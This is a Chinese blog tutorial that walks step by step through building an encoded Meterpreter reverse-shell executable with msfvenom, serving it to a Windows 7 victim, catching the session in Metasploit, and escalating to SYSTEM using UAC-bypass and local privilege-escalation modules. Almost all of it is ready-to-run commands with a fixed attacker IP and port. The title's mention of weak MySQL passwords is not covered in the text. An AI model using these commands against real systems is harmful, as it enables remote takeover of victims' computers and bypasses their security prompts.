3306弱口令提权工具_kali 绕过uac提权

18cf1e8b86df078edb6ef679be3d2fc1.gif

1. msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.2.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 7 -f exe -o a.exe  --产生一个exe文件204c38d9d2912c4aaa20e0b09fddf614.png 

2. service apache2 start   --开启apache服务
3. service postgresql start --开启msf数据库服务
4. cp ./a.exe /var/www/html/ --在http目录下

535c73c9b618d1a24f52e9acb3bd3685.png 


5. 打开win7访问kali ip 下载a.exe

d0082ae01c36bdfcfb32ccab69b4b20a.png

13c28a4d2a5cff0677492749c3a36978.png 


6. Msfconsole           --启动msf

4e39e98865ebf0173b94c270239cb67d.png
7. use exploit/multi/handler   --使用这个模块

d240f2a73ca4c6016b5c3115717cf28e.png 


8. set payload windows/meterpreter/reverse_tcp  --配置payload

84ea455d4f6b8ec800ad3e443c0a30ec.png 

9. set lhost 192.168.2.128  --配置kali  ip

dc4704a851ef4b1a237c96953945ff1f.png 

10. set lport 4444    --配置监听端口 和exe文件端口一样


11. Show options   --查看一下参数

ccaa0043487130c1e0a46dc454cce11a.png 

12. exploit -j  --开始监听

85a414283523412a6b6f405a327e537a.png 


13. 然后在win7电脑上运行a.Exe

f6cdbd84a1a05bfa8bff624ba8a712ca.png 
14. 在kali上就会返回一个会话用sessions 查看

49b49f9213ca8250afffa270cc2fa9c0.png
15. sessions -i 1  --进入会话

9b254afb7dc0234d8c4f6f6826457c15.png 

16. load priv   --更新插件

8a835498a71c1c43e6ac9cf8ebe1c7a1.png 

17. Getsystem  --获取权限  发现没有权限 需要提权
18. Background --退出会话c32ce64d23c19493dab899ff18fc4ba0.png 


19. use exploit/windows/local/ask --进入提权模块

9ab270dc55c3d4f41acbcf499d18435d.png 

20. show options  --查看配置参数

b6f9c171a8bfd585d8e9d05f74962d46.png

 
21. set payload windows/meterpreter/reverse_tcp --设置payload

22. set lhost 192.168.2.128  --设置kali ip
23. set filename win_update.exe  --设置win弹窗名字
24. set filename win_update.exe --设置会话
25. show optionsd4f4853bde1e1e96cd648e388a075ab4.png 

26. Exploit  --攻击 会多一个会话
27. sessions -i 2  --进入会话

28. load priv 更新插件

29. Getsystem  --提权 

922304763da247ef4623179a559cd8b6.png 

--上边那个提权还要弹窗 接下来再说一个模块不需要用户在点击 “是”
30. use exploit/windows/local/bypassuac_injection
31. set payload windows/meterpreter/reverse_tcp
32. Set lhost 192.168.2.128
33. set session 1
34. exploit  --在得到一个提权的会话
35. 还有2个模块可以用提权以下是  模块和payload(参数配置如上)
36. use exploit/windows/local/ms13_053_schlamperei
set payload windows/meterpreter/reverse_tcp
37. use exploit/windows/local/ppr_flatten_rec
set payload windows/meterpreter/reverse_tcp-- set payload windows/viewomly/reverse_tcp
-- set viewonly no(这个payload可以用图型话界面 设置viewonly为 no可以操作)

4fa2178fd528dc9d0e9c1b310cc65f46.png

推荐文章++++

7fe8646bdd940b0d2743e11cf0dfc8e7.png

*Windows 下的提权大合集

*AXIS2 弱口令提权

*Windows低权限提权

fc3dd2b0b8e87ad72a9b9aa09a56fc73.png

b42b8eb6dec407ec497299524c9cf7dd.gif

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值